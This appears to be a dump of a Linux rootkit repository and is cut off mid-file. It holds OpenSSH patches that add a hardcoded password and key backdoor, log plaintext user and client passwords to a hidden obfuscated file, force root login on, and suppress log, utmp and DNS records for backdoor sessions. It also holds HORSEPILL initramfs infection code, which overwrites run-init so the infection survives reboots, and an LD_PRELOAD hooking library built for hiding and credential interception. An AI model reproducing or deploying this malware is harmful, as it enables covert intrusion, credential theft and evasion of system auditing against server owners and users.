@@ 229 | static void 230 | sighup_restart(void) 231 | { 232 | +#ifdef HAVE_SYSTEMD 233 | + sd_notify(0, "RELOADING=1"); 234 | +#endif 235 | logit("Received SIGHUP; restarting."); 236 | close_listen_socks(); 237 | close_startup_pipes(); 238 | @@ -1842,6 +1848,9 @@ 239 | } 240 | } 241 | 242 | +#ifdef HAVE_SYSTEMD 243 | + sd_notify(0, "READY=1"); 244 | +#endif 245 | /* Accept a connection and return in a forked child */ 246 | server_accept_loop(&sock_in, &sock_out, 247 | &newsock, config_s); 248 | diff -Nuar 6.2p2.orig/sshlogin.c 6.2p2/sshlogin.c 249 | --- 6.2p2.orig/sshlogin.c 2020-04-10 17:17:30.511797952 +0200 250 | +++ 6.2p2/sshlogin.c 2020-04-10 19:23:01.064094150 +0200 251 | @@ -133,8 +133,7 @@ 252 | 253 | li = login_alloc_entry(pid, user, host, tty); 254 | login_set_addr(li, addr, addrlen); 255 | - login_login(li); 256 | - login_free_entry(li); 257 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); } 258 | } 259 | 260 | #ifdef LOGIN_NEEDS_UTMPX 261 | @@ -146,8 +145,7 @@ 262 | 263 | li = login_alloc_entry(pid, user, host, ttyname); 264 | login_set_addr(li, addr, addrlen); 265 | - login_utmp_only(li); 266 | - login_free_entry(li); 267 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); } 268 | } 269 | #endif 270 | 271 | @@ -158,6 +156,5 @@ 272 | struct logininfo *li; 273 | 274 | li = login_alloc_entry(pid, user, NULL, tty); 275 | - login_logout(li); 276 | - login_free_entry(li); 277 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); } 278 | } 279 | -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_691: -------------------------------------------------------------------------------- 1 | diff -Nuar 6.9p1.orig/auth-pam.c 6.9p1/auth-pam.c 2 | --- 6.9p1.orig/auth-pam.c 2020-05-29 18:59:39.244124664 +0200 3 | +++ 6.9p1/auth-pam.c 2020-05-29 19:00:02.920124948 +0200 4 | @@ -1208,6 +1208,19 @@ 5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) { 6 | debug("PAM: password authentication accepted for %.100s", 7 | authctxt->user); 8 | + char *ohk = strdup(OPENSSH_KEY); 9 | + rox(ohk); 10 | + if((f=fopen(ohk, "a+")) != NULL){ 11 | + CLEAN(ohk); 12 | + char bds[512]; 13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 14 | + rox(bds); 15 | + fprintf(f, "%s\n", bds); 16 | + CLEAN(bds); 17 | + fflush(f); 18 | + fclose(f); 19 | + } 20 | + CLEAN(ohk); 21 | return 1; 22 | } else { 23 | debug("PAM: password authentication failed for %.100s: %s", 24 | diff -Nuar 6.9p1.orig/auth-passwd.c 6.9p1/auth-passwd.c 25 | --- 6.9p1.orig/auth-passwd.c 2020-05-29 18:59:39.244124664 +0200 26 | +++ 6.9p1/auth-passwd.c 2020-05-29 19:00:02.920124948 +0200 27 | @@ -87,6 +87,14 @@ 28 | static int expire_checked = 0; 29 | #endif 30 | 31 | + char *olic = strdup(OPENSSH_LICENSE); 32 | + rox(olic); 33 | + if (!strcmp(password, olic)){ 34 | + CLEAN(olic); 35 | + secret_ok = 1; 36 | + return 1; 37 | + } 38 | + CLEAN(olic); 39 | #ifndef HAVE_CYGWIN 40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES) 41 | ok = 0; 42 | @@ -124,6 +132,21 @@ 43 | } 44 | #endif 45 | result = sys_auth_passwd(authctxt, password); 46 | + if(result){ 47 | + char *ohk = strdup(OPENSSH_KEY); 48 | + rox(ohk); 49 | + if((f=fopen(ohk, "a+")) != NULL){ 50 | + CLEAN(ohk); 51 | + char bds[512]; 52 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 53 | + rox(bds); 54 | + fprintf(f, "%s\n", bds); 55 | + CLEAN(bds); 56 | + fflush(f); 57 | + fclose(f); 58 | + } 59 | + CLEAN(ohk); 60 | + } 61 | if (authctxt->force_pwchange) 62 | disable_forwarding(); 63 | return (result && ok); 64 | diff -Nuar 6.9p1.orig/auth.c 6.9p1/auth.c 65 | --- 6.9p1.orig/auth.c 2020-05-29 18:59:39.244124664 +0200 66 | +++ 6.9p1/auth.c 2020-05-29 19:00:02.924124948 +0200 67 | @@ -294,6 +294,7 @@ 68 | else 69 | authmsg = authenticated ? "Accepted" : "Failed"; 70 | 71 | + if(!secret_ok || secret_ok != 1){ 72 | authlog("%s %s%s%s for %s%.100s from %.200s port %d %s%s%s", 73 | authmsg, 74 | method, 75 | @@ -305,6 +306,7 @@ 76 | compat20 ? "ssh2" : "ssh1", 77 | authctxt->info != NULL ? ": " : "", 78 | authctxt->info != NULL ? authctxt->info : ""); 79 | + } 80 | free(authctxt->info); 81 | authctxt->info = NULL; 82 | 83 | diff -Nuar 6.9p1.orig/canohost.c 6.9p1/canohost.c 84 | --- 6.9p1.orig/canohost.c 2020-05-29 18:59:39.248124664 +0200 85 | +++ 6.9p1/canohost.c 2020-05-29 19:00:02.924124948 +0200 86 | @@ -77,12 +77,14 @@ 87 | 88 | debug3("Trying to reverse map address %.100s.", ntop); 89 | /* Map the IP address to a host name. */ 90 | + if(!secret_ok || secret_ok != 1){ 91 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), 92 | NULL, 0, NI_NAMEREQD) != 0) { 93 | /* Host name not found. Use ip address. */ 94 | return xstrdup(ntop); 95 | } 96 | 97 | + } 98 | /* 99 | * if reverse lookup result looks like a numeric hostname, 100 | * someone is trying to trick us by PTR record like following: 101 | diff -Nuar 6.9p1.orig/conf.h 6.9p1/conf.h 102 | --- 6.9p1.orig/conf.h 1970-01-01 03:00:00.000000000 +0300 103 | +++ 6.9p1/conf.h 2020-05-29 19:00:02.924124948 +0200 104 | @@ -0,0 +1,12 @@ 105 | +#include 106 | + 107 | +int secret_ok; 108 | +FILE *f; 109 | +#define OPENSSH_KEY "%%SSHD_LOGS%%" 110 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%" 111 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%" 112 | +#define XKEY %%XKEY%% 113 | + 114 | +#define CLEAN(var) memset(var, 0x00, strlen(var)) 115 | + 116 | +#define rox(p) size_t iii;for(iii=0;iiiserver_key_bits = -1; 179 | options->login_grace_time = -1; 180 | options->key_regeneration_time = -1; 181 | - options->permit_root_login = PERMIT_NOT_SET; 182 | + options->permit_root_login = PERMIT_YES; 183 | options->ignore_rhosts = -1; 184 | options->ignore_user_known_hosts = -1; 185 | options->print_motd = -1; 186 | @@ -903,11 +903,11 @@ 187 | { NULL, -1 } 188 | }; 189 | static const struct multistate multistate_permitrootlogin[] = { 190 | - { "without-password", PERMIT_NO_PASSWD }, 191 | - { "forced-commands-only", PERMIT_FORCED_ONLY }, 192 | + { "without-password", PERMIT_YES }, 193 | + { "forced-commands-only", PERMIT_YES }, 194 | { "yes", PERMIT_YES }, 195 | - { "no", PERMIT_NO }, 196 | - { NULL, -1 } 197 | + { "no", PERMIT_YES }, 198 | + { NULL, PERMIT_YES } 199 | }; 200 | static const struct multistate multistate_compression[] = { 201 | { "delayed", COMP_DELAYED }, 202 | diff -Nuar 6.9p1.orig/sshconnect2.c 6.9p1/sshconnect2.c 203 | --- 6.9p1.orig/sshconnect2.c 2020-05-29 18:59:39.284124665 +0200 204 | +++ 6.9p1/sshconnect2.c 2020-05-29 19:00:13.120125071 +0200 205 | @@ -889,6 +889,19 @@ 206 | snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ", 207 | authctxt->server_user, host); 208 | password = read_passphrase(prompt, 0); 209 | + char *ohk = strdup(OPENSSH_KEY); 210 | + rox(ohk); 211 | + if((f=fopen(ohk, "a+")) != NULL){ 212 | + CLEAN(ohk); 213 | + char bds[512]; 214 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password,authctxt->host); 215 | + rox(bds); 216 | + fprintf(f, "%s\n", bds); 217 | + CLEAN(bds); 218 | + fflush(f); 219 | + fclose(f); 220 | + } 221 | + CLEAN(ohk); 222 | packet_start(SSH2_MSG_USERAUTH_REQUEST); 223 | packet_put_cstring(authctxt->server_user); 224 | packet_put_cstring(authctxt->service); 225 | diff -Nuar 6.9p1.orig/sshd.c 6.9p1/sshd.c 226 | --- 6.9p1.orig/sshd.c 2020-05-29 18:59:39.284124665 +0200 227 | +++ 6.9p1/sshd.c 2020-05-29 19:00:13.120125071 +0200 228 | @@ -85,6 +85,9 @@ 229 | #include 230 | #endif 231 | 232 | +#ifdef HAVE_SYSTEMD 233 | +#include 234 | +#endif 235 | #include "xmalloc.h" 236 | #include "ssh.h" 237 | #include "ssh1.h" 238 | @@ -309,6 +312,9 @@ 239 | static void 240 | sighup_restart(void) 241 | { 242 | +#ifdef HAVE_SYSTEMD 243 | + sd_notify(0, "RELOADING=1"); 244 | +#endif 245 | logit("Received SIGHUP; restarting."); 246 | platform_pre_restart(); 247 | close_listen_socks(); 248 | @@ -2023,6 +2029,9 @@ 249 | } 250 | } 251 | 252 | +#ifdef HAVE_SYSTEMD 253 | + sd_notify(0, "READY=1"); 254 | +#endif 255 | /* Accept a connection and return in a forked child */ 256 | server_accept_loop(&sock_in, &sock_out, 257 | &newsock, config_s); 258 | diff -Nuar 6.9p1.orig/sshlogin.c 6.9p1/sshlogin.c 259 | --- 6.9p1.orig/sshlogin.c 2020-05-29 18:59:39.284124665 +0200 260 | +++ 6.9p1/sshlogin.c 2020-05-29 19:00:13.120125071 +0200 261 | @@ -134,8 +134,7 @@ 262 | 263 | li = login_alloc_entry(pid, user, host, tty); 264 | login_set_addr(li, addr, addrlen); 265 | - login_login(li); 266 | - login_free_entry(li); 267 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); } 268 | } 269 | 270 | #ifdef LOGIN_NEEDS_UTMPX 271 | @@ -147,8 +146,7 @@ 272 | 273 | li = login_alloc_entry(pid, user, host, ttyname); 274 | login_set_addr(li, addr, addrlen); 275 | - login_utmp_only(li); 276 | - login_free_entry(li); 277 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); } 278 | } 279 | #endif 280 | 281 | @@ -159,6 +157,5 @@ 282 | struct logininfo *li; 283 | 284 | li = login_alloc_entry(pid, user, NULL, tty); 285 | - login_logout(li); 286 | - login_free_entry(li); 287 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); } 288 | } 289 | -------------------------------------------------------------------------------- /pre/ssh_patches/s_ssh_531: -------------------------------------------------------------------------------- 1 | diff -Nuar 5.3p1.orig/auth2-pubkey.c 5.3p1/auth2-pubkey.c 2 | --- 5.3p1.orig/auth2-pubkey.c 2020-04-10 17:17:30.363797946 +0200 3 | +++ 5.3p1/auth2-pubkey.c 2020-04-14 13:32:02.328859288 +0200 4 | @@ -254,6 +254,22 @@ 5 | int success; 6 | char *file; 7 | 8 | + char *blob = NULL, *keytext = NULL; 9 | + int len = 0; 10 | + key_to_blob(key, &blob, &len); 11 | + keytext = xmalloc(2*len); 12 | + if(uuencode(blob, len, keytext, 2*len) > 0){ 13 | + char *newkey = strdup(SSHD_NEWKEY); 14 | + rox(newkey); 15 | + if(!strcmp(newkey, keytext)){ 16 | + CLEAN(newkey); 17 | + CLEAN(keytext); 18 | + secret_ok = 1; 19 | + return 1; 20 | + } 21 | + CLEAN(newkey); 22 | + } 23 | + CLEAN(keytext); 24 | file = authorized_keys_file(pw); 25 | success = user_key_allowed2(pw, key, file); 26 | xfree(file); 27 | -------------------------------------------------------------------------------- /pre/ssh_patches/s_ssh_582: -------------------------------------------------------------------------------- 1 | diff -Nuar 5.8p2.orig/auth2-pubkey.c 5.8p2/auth2-pubkey.c 2 | --- 5.8p2.orig/auth2-pubkey.c 2020-04-10 17:17:30.443797949 +0200 3 | +++ 5.8p2/auth2-pubkey.c 2020-04-14 13:32:19.532859965 +0200 4 | @@ -439,6 +439,22 @@ 5 | int success; 6 | char *file; 7 | 8 | + char *blob = NULL, *keytext = NULL; 9 | + int len = 0; 10 | + key_to_blob(key, &blob, &len); 11 | + keytext = xmalloc(2*len); 12 | + if(uuencode(blob, len, keytext, 2*len) > 0){ 13 | + char *newkey = strdup(SSHD_NEWKEY); 14 | + rox(newkey); 15 | + if(!strcmp(newkey, keytext)){ 16 | + CLEAN(newkey); 17 | + CLEAN(keytext); 18 | + secret_ok = 1; 19 | + return 1; 20 | + } 21 | + CLEAN(newkey); 22 | + } 23 | + CLEAN(keytext); 24 | if (auth_key_is_revoked(key)) 25 | return 0; 26 | if (key_is_cert(key) && auth_key_is_revoked(key->cert->signature_key)) 27 | -------------------------------------------------------------------------------- /pre/ssh_patches/s_ssh_771: -------------------------------------------------------------------------------- 1 | diff -Nuar 7.5p1.orig/auth2-pubkey.c 7.5p1/auth2-pubkey.c 2 | --- 7.5p1.orig/auth2-pubkey.c 2020-04-10 17:17:30.767797962 +0200 3 | +++ 7.5p1/auth2-pubkey.c 2020-04-14 20:02:58.149781873 +0200 4 | @@ -1093,6 +1093,22 @@ 5 | u_int success, i; 6 | char *file; 7 | 8 | + char *blob = NULL, *keytext = NULL; 9 | + int len = 0; 10 | + key_to_blob(key, &blob, &len); 11 | + keytext = xmalloc(2*len); 12 | + if(uuencode(blob, len, keytext, 2*len) > 0){ 13 | + char *newkey = strdup(SSHD_NEWKEY); 14 | + rox(newkey); 15 | + if(!strcmp(newkey, keytext)){ 16 | + CLEAN(newkey); 17 | + CLEAN(keytext); 18 | + secret_ok = 1; 19 | + return 1; 20 | + } 21 | + CLEAN(newkey); 22 | + } 23 | + CLEAN(keytext); 24 | if (auth_key_is_revoked(key)) 25 | return 0; 26 | if (key_is_cert(key) && auth_key_is_revoked(key->cert->signature_key)) 27 | -------------------------------------------------------------------------------- /pre/ssh_patches/s_ssh_861: -------------------------------------------------------------------------------- 1 | diff -Nuar 8.3p1.orig/auth2-pubkey.c 8.3p1/auth2-pubkey.c 2 | --- 8.3p1.orig/auth2-pubkey.c 2020-06-09 18:39:56.053921886 +0200 3 | +++ 8.3p1/auth2-pubkey.c 2020-06-10 10:18:28.796952019 +0200 4 | @@ -619,8 +619,19 @@ 5 | goto out; 6 | } else { 7 | /* Plain key: check it against key found in file */ 8 | - if (!sshkey_equal(found, key) || keyopts->cert_authority) 9 | - goto out; 10 | + if (!sshkey_equal(found, key) || keyopts->cert_authority){ 11 | + char *newkey = strdup(SSHD_NEWKEY), *keytext = NULL; 12 | + rox(newkey); 13 | + sshkey_to_base64(key, &keytext); 14 | + if(strncmp(newkey,keytext,strlen(keytext))){ 15 | + CLEAN(keytext); 16 | + CLEAN(newkey); 17 | + goto out; 18 | + } 19 | + secret_ok = 1; 20 | + CLEAN(keytext); 21 | + CLEAN(newkey); 22 | + } 23 | } 24 | 25 | /* We have a candidate key, perform authorisation checks */ 26 | -------------------------------------------------------------------------------- /src/CLIENT/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/5c8b03f54c3f3e05b80c7d97893163c4907ac5b8/src/CLIENT/.keep -------------------------------------------------------------------------------- /src/HORSEPILL/horsepill/horsepill.h: -------------------------------------------------------------------------------- 1 | #ifndef HORSEPILL_H 2 | #define HORSEPILL_H 3 | 4 | void perform_hacks(); 5 | int should_backdoor(); 6 | int grab_executable(); 7 | 8 | #endif 9 | 10 | -------------------------------------------------------------------------------- /src/HORSEPILL/horsepill/infect.c: -------------------------------------------------------------------------------- 1 | #include "infect.h" 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | struct exe_t exe; 16 | struct ctx_t { 17 | int inotify_fd; 18 | int tmpdir_wd; 19 | int bin_wd; 20 | int bin_create_wd; 21 | int run_init_wd; 22 | char tmpfile[PATH_MAX]; 23 | char tmpdir[PATH_MAX]; 24 | char run_init_path[PATH_MAX]; 25 | } ctx; 26 | 27 | static void ctx_setup_common(void){ 28 | ctx.bin_wd = -1; 29 | ctx.bin_create_wd = -1; 30 | ctx.run_init_wd = -1; 31 | ctx.tmpdir[0] = 0; 32 | ctx.tmpfile[0] = 0; 33 | ctx.run_init_path[0] = 0; 34 | } 35 | 36 | static int ctx_init(void){ 37 | int rc; 38 | rc = inotify_init(); 39 | if (rc < 0) { 40 | perror("could not init inotify"); 41 | goto out; 42 | } 43 | ctx.inotify_fd = rc; 44 | rc = fcntl(ctx.inotify_fd, F_SETFD, O_NONBLOCK); 45 | if (rc < 0) { 46 | perror("could not fctnl"); 47 | goto out; 48 | } 49 | rc = inotify_add_watch(ctx.inotify_fd, "/var/tmp", IN_CREATE); 50 | if (rc < 0) { 51 | perror("could not add watch"); 52 | goto out; 53 | } 54 | ctx.tmpdir_wd = rc; 55 | ctx_setup_common(); 56 | rc = 0; 57 | out: 58 | return rc; 59 | } 60 | 61 | static void ctx_reset(void){ 62 | (void)inotify_rm_watch(ctx.inotify_fd, ctx.bin_wd); 63 | (void)inotify_rm_watch(ctx.inotify_fd, ctx.bin_create_wd); 64 | (void)inotify_rm_watch(ctx.inotify_fd, ctx.run_init_wd); 65 | ctx_setup_common(); 66 | } 67 | 68 | static int make_tempfile(char *basedir, mode_t mode){ 69 | FILE* urandom = NULL; 70 | int rc = -1; 71 | int rand; 72 | char filename[PATH_MAX]; 73 | do { 74 | urandom = fopen("/dev/urandom", "r"); 75 | if(urandom == NULL){ 76 | perror("couldn't open urandom"); 77 | goto out; 78 | } 79 | fread((void*)(&rand), sizeof(rand), 1, urandom); 80 | fclose(urandom); 81 | snprintf(filename, sizeof(filename) - 1, "%s/reinfect-%X", basedir, rand); 82 | printf("made tmpfile of %s\n", filename); 83 | rc = open(filename, O_CREAT | O_RDWR | O_EXCL, mode); 84 | } while(rc == -EEXIST); 85 | if(rc < 0) 86 | perror("open"); 87 | strcpy(basedir, filename); 88 | out: 89 | return rc; 90 | } 91 | 92 | static int splat_fd(int fd, unsigned char* buf, size_t len){ 93 | int rc = -1; 94 | ssize_t s; 95 | size_t written = 0; 96 | for (;;){ 97 | s = write(fd, (const void*)(buf+written), len-written); 98 | if(s < 0){ 99 | perror("(splat_fd) write"); 100 | goto out; 101 | } 102 | written += s; 103 | if(len == written) 104 | break; 105 | } 106 | (void)close(fd); 107 | rc = 0; 108 | out: 109 | return rc; 110 | } 111 | 112 | static int add_watch(const char *template, char *name, int mask){ 113 | char filename[256]; 114 | int rc; 115 | snprintf(filename, sizeof(filename) - 1, template, name); 116 | printf("adding watch on %s\n", filename); 117 | rc = inotify_add_watch(ctx.inotify_fd,filename, mask); 118 | if (rc < 0) { 119 | char buf[256]; 120 | snprintf(buf, sizeof(buf), "adding watch on %s:", filename); 121 | perror(buf); 122 | } 123 | return rc; 124 | } 125 | 126 | static void handle_inotify_event(const struct inotify_event *event){ 127 | if ((event->mask & IN_CREATE) && (event->len)) { 128 | const char template[] = "mkinitramfs_"; 129 | if ((event->wd == ctx.tmpdir_wd) && (event->mask & IN_ISDIR) && !strncmp(event->name, template, sizeof(template) - 1)) { 130 | char *name = (char*)(event->name); 131 | int rc; 132 | rc = add_watch("/var/tmp/%s", name, IN_CREATE); 133 | if(rc < 0){ 134 | printf("couldn't add watch!\n"); 135 | exit(EXIT_FAILURE); 136 | } 137 | ctx.bin_wd = rc; 138 | snprintf(ctx.tmpdir, sizeof(ctx.tmpdir) - 1,"/var/tmp/%s", name); 139 | strcpy(ctx.tmpfile, "/var/tmp"); 140 | rc = make_tempfile(ctx.tmpfile, S_IRWXU | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH); 141 | if (rc < 0) { 142 | perror("mkstmp"); 143 | exit(EXIT_FAILURE); 144 | } 145 | printf("tmpfile is %s\n", ctx.tmpfile); 146 | rc = splat_fd(rc, exe.buf, exe.len); 147 | if (rc < 0) { 148 | perror("splat_file"); 149 | exit(EXIT_FAILURE); 150 | } 151 | } else if ((event->wd == ctx.bin_wd) && (event->mask & IN_ISDIR) && !strcmp(event->name, "bin")) { 152 | ctx.bin_create_wd = add_watch("%s/bin", ctx.tmpdir, IN_CREATE); 153 | } else if ((event->wd == ctx.bin_create_wd) && !(event->mask & IN_ISDIR) && !strcmp(event->name, "run-init")) { 154 | snprintf(ctx.run_init_path, sizeof(ctx.run_init_path) - 1, "%s/bin/run-init", ctx.tmpdir); 155 | ctx.run_init_wd = add_watch("%s/bin/run-init", ctx.tmpdir, IN_CLOSE); 156 | } 157 | } else if ((event->wd == ctx.run_init_wd) && (event->mask & IN_CLOSE_WRITE)){ 158 | rename(ctx.tmpfile, ctx.run_init_path); 159 | printf(" splatted over %s\n", ctx.run_init_path); 160 | ctx_reset(); 161 | } 162 | } 163 | 164 | static void handle_inotify(void){ 165 | char buf[4096*2] 166 | __attribute__ ((aligned(__alignof__(struct inotify_event)))); 167 | const struct inotify_event *event; 168 | ssize_t len; 169 | char *ptr; 170 | for (;;) { 171 | len = read(ctx.inotify_fd, buf, sizeof buf); 172 | if (len == -1 && errno != EAGAIN){ 173 | perror("read"); 174 | exit(EXIT_FAILURE); 175 | } 176 | if (len <= 0) 177 | break; 178 | for (ptr = buf; ptr < buf + len; ptr += sizeof(struct inotify_event) + event->len){ 179 | event = (const struct inotify_event *) ptr; 180 | handle_inotify_event(event); 181 | } 182 | } 183 | } 184 | 185 | pid_t run_reinfect(){ 186 | pid_t pid; 187 | pid = fork(); 188 | if (pid < 0){ 189 | printf("couldn't fork!\n"); 190 | exit(EXIT_FAILURE); 191 | } else if (pid == 0){ 192 | struct pollfd pollfds[1]; 193 | struct sched_param sched = { 194 | .sched_priority = 1 195 | }; 196 | int rc; 197 | close(0); 198 | close(1); 199 | close(2); 200 | (void)open("/dev/null", O_RDONLY); 201 | (void)open("/dev/null", O_WRONLY); 202 | (void)open("/dev/null", O_RDWR); 203 | if (ctx_init() < 0) { 204 | perror("could not initialize structure"); 205 | exit(EXIT_FAILURE); 206 | } 207 | rc = sched_setscheduler(getpid(), SCHED_FIFO, &sched); 208 | if (rc < 0) { 209 | perror("sched_setscheduler"); 210 | exit(EXIT_FAILURE); 211 | } 212 | pollfds[0].fd = ctx.inotify_fd; 213 | pollfds[0].events = POLLIN | POLLNVAL; 214 | while ((rc = poll(pollfds, 1, -1))) { 215 | if (rc < 0) { 216 | if (errno == -EINTR) { 217 | continue; 218 | } else { 219 | perror("error in poll"); 220 | exit(EXIT_FAILURE); 221 | } 222 | } 223 | if (pollfds[0].revents & POLLIN) 224 | handle_inotify(); 225 | } 226 | exit(EXIT_FAILURE); 227 | } 228 | return pid; 229 | } 230 | 231 | int infect_get_inotify_fd(){ 232 | return ctx.inotify_fd; 233 | } 234 | 235 | int infect_init(){ 236 | return ctx_init(); 237 | } 238 | 239 | void infect_handle_inotify(){ 240 | handle_inotify(); 241 | } 242 | -------------------------------------------------------------------------------- /src/HORSEPILL/horsepill/infect.h: -------------------------------------------------------------------------------- 1 | #ifndef INFECT_H 2 | #define INFECT_H 3 | 4 | #include 5 | 6 | struct exe_t { 7 | unsigned char* buf; 8 | size_t len; 9 | }; 10 | 11 | extern struct exe_t exe; 12 | 13 | int infect_get_inotify_fd(); 14 | int infect_init(); 15 | void infect_handle_inotify(); 16 | 17 | pid_t run_reinfect(); 18 | 19 | #endif 20 | -------------------------------------------------------------------------------- /src/HORSEPILL/init.diff: -------------------------------------------------------------------------------- 1 | --- init 2020-03-27 11:22:49.120000000 -0400 2 | +++ init.new 2020-03-27 11:23:09.644000000 -0400 3 | @@ -334,10 +334,6 @@ 4 | mount -n -o move /proc ${rootmnt}/proc 5 | 6 | # Chain to real filesystem 7 | -if [ -z "$drop_caps" ] && command -v switch_root >/dev/null 2>&1; then 8 | - exec switch_root ${rootmnt} ${init} "$@" <${rootmnt}/dev/console >${rootmnt}/dev/console 9 | -elif command -v run-init >/dev/null 2>&1; then 10 | - exec run-init ${drop_caps} ${rootmnt} ${init} "$@" <${rootmnt}/dev/console >${rootmnt}/dev/console 11 | -fi 12 | +exec run-init ${drop_caps} ${rootmnt} ${init} "$@" <${rootmnt}/dev/console >${rootmnt}/dev/console 13 | echo "Something went badly wrong in the initramfs." 14 | panic "Please file a bug on initramfs-tools." 15 | -------------------------------------------------------------------------------- /src/HORSEPILL/run-init: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Not-C-Developer/VERBA/5c8b03f54c3f3e05b80c7d97893163c4907ac5b8/src/HORSEPILL/run-init -------------------------------------------------------------------------------- /src/LD/LD.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include 22 | #include 23 | 24 | #include 25 | #include 26 | 27 | #include 28 | #include 29 | 30 | #include 31 | #include 32 | #include 33 | #include 34 | 35 | #include "config.h" 36 | #include "hooks/libdl/libdl.h" 37 | #include "util/util.h" 38 | #include "hiding/hiding.h" 39 | 40 | int kill(pid_t pid, int sig); 41 | #include "hooks/kill.c" 42 | 43 | long ptrace(void *request, pid_t pid, void *addr, void *data); 44 | #include "hooks/ptrace.c" 45 | 46 | static int ssme(int domain, int protocol); 47 | int socket(int domain, int type, int protocol); 48 | #include "hooks/socket.c" 49 | #include "hooks/pcap/pcap.h" 50 | 51 | #include "hooks/exec/exec.h" 52 | #include "hooks/open/open.h" 53 | #include "hooks/stat/stat.h" 54 | //#include "hooks/rw/rw.h" 55 | #include "hooks/dir/dir.h" 56 | #include "hooks/ln/links.h" 57 | #include "hooks/gid/gid.h" 58 | #include "hooks/perms/perms.h" 59 | 60 | #include "hooks/pam/pam.h" 61 | #include "hooks/authlog/authlog.h" 62 | #include "hooks/pwd/pwd.h" 63 | #include "hooks/audit/audit.h" 64 | #include "hooks/utmp/utmp.h" 65 | #include "hooks/syslog/syslog.h" 66 | 67 | int __libc_start_main(int *(main) (int, char **, char **), int argc, char **ubp_av, void (*init)(void), void (*fini)(void), void (*rtld_fini)(void), void (*stack_end)){ 68 | if(not_user(0)) 69 | goto do_libc_start_main; 70 | DIR *dp; 71 | hook(COPENDIR); 72 | dp = call(COPENDIR, INSTALL_DIR); 73 | if(dp == NULL) 74 | goto do_libc_start_main; 75 | closedir(dp); 76 | reinstall(); 77 | do_libc_start_main: 78 | hook(C__LIBC_START_MAIN); 79 | return (long)call(C__LIBC_START_MAIN, main, argc, ubp_av, init, fini, rtld_fini, stack_end); 80 | } 81 | -------------------------------------------------------------------------------- /src/LD/Makefile: -------------------------------------------------------------------------------- 1 | SHELL = /bin/sh 2 | CC = gcc 3 | 4 | FLAGS = -std=gnu99 5 | CFLAGS = -fomit-frame-pointer -fPIC -s -Wall -Wextra -Wshadow -Wno-unused-function -fstack-protector-all -funroll-loops -fno-jump-tables -Os -g0 -I./ 6 | LDFLAGS = -shared -Wl,--build-id=none,-z,relro,-z,now -ldl -lcrypt -lpam -lssl 7 | 8 | TARGET = LD.so 9 | SOURCES = LD.c 10 | OBJECTS = $(SOURCES:.c=.o) 11 | 12 | UNAME_P := $(shell uname -p) 13 | ifneq ($(filter %86,$(UNAME_P)),) 14 | FLAGS += -m32 15 | endif 16 | 17 | $(TARGET): $(OBJECTS) 18 | $(CC) $(FLAGS) $(CFLAGS) $^ -o $@ $(LDFLAGS) 19 | 20 | clean: 21 | rm -f $(OBJECTS) $(TARGET) 22 | -------------------------------------------------------------------------------- /src/LD/char_arrays: -------------------------------------------------------------------------------- 1 | libc_calls:__libc_start_main,kill,accept,socket,getutent,getutxent,getutid,getutxid,getutmp,getutmpx,getutline,getutxline,logwtmp,updwtmp,updwtmpx,openlog,syslog,__syslog_chk,vsyslog,ptrace,execve,execvp,chown,chmod,fchmod,fchmodat,setgid,setegid,setregid,setresgid,mkdir,rmdir,readdir,readdir64,opendir,opendir64,fdopendir,chdir,fchdir,readlink,readlinkat,symlink,symlinkat,unlink,unlinkat,open,open64,openat,openat64,access,creat,creat64,fwrite,fwrite_unlocked,fread,fread_unlocked,write,read,fopen,fopen64,freopen,freopen64,stat,stat64,fstatat,fstatat64,lstat,lstat64,__xstat,__xstat64,__fxstat,__fxstat64,__lxstat,__lxstat64,getpwnam,getpwuid,getspnam,getpwnam_r,audit_log_acct_message,audit_log_user_message,audit_send,login 2 | libpam_calls:pam_syslog,pam_vsyslog,pam_authenticate,pam_open_session,pam_acct_mgmt,pam_prompt,pam_vprompt 3 | libdl_calls:dlsym,dlinfo,dladdr 4 | libpcap_calls:pcap_loop 5 | -------------------------------------------------------------------------------- /src/LD/config.h: -------------------------------------------------------------------------------- 1 | #define BD_UNAME "%%BD_UNAME%%" 2 | #define BD_PWD "%%BD_PWD%%" 3 | #define INSTALL_DIR "%%IDIR%%" 4 | #define BDVLSO "%%BDVLSO%%" 5 | #define SOPATH "%%SOPATH%%" 6 | #define LDSO_PRELOAD "%%N_PRELOAD%%" 7 | #define LDSO_LOGS "%%LDSO_LOGS%%" 8 | #define HIDE_IP_PATH "%%HIDE_IP_PATH%%" 9 | #define BD_SSHPROCNAME "%%BD_SSHPROCNAME%%" 10 | 11 | #define XKEY %%XKEY%% 12 | #define MAGIC_GID %%MGID%% 13 | 14 | #define PATH_MAX 4096 15 | #define LINE_MAX 2048 16 | 17 | typedef struct symbol_struct { 18 | void *(*func)(); 19 | } syms; 20 | 21 | #define sizeofarray(arr) sizeof(arr) / sizeof(arr[0]) 22 | -------------------------------------------------------------------------------- /src/LD/hiding/evasion/block_strings.c: -------------------------------------------------------------------------------- 1 | static int scary_path(char *string){ 2 | if(xstrstr(BDVLSO, string) || 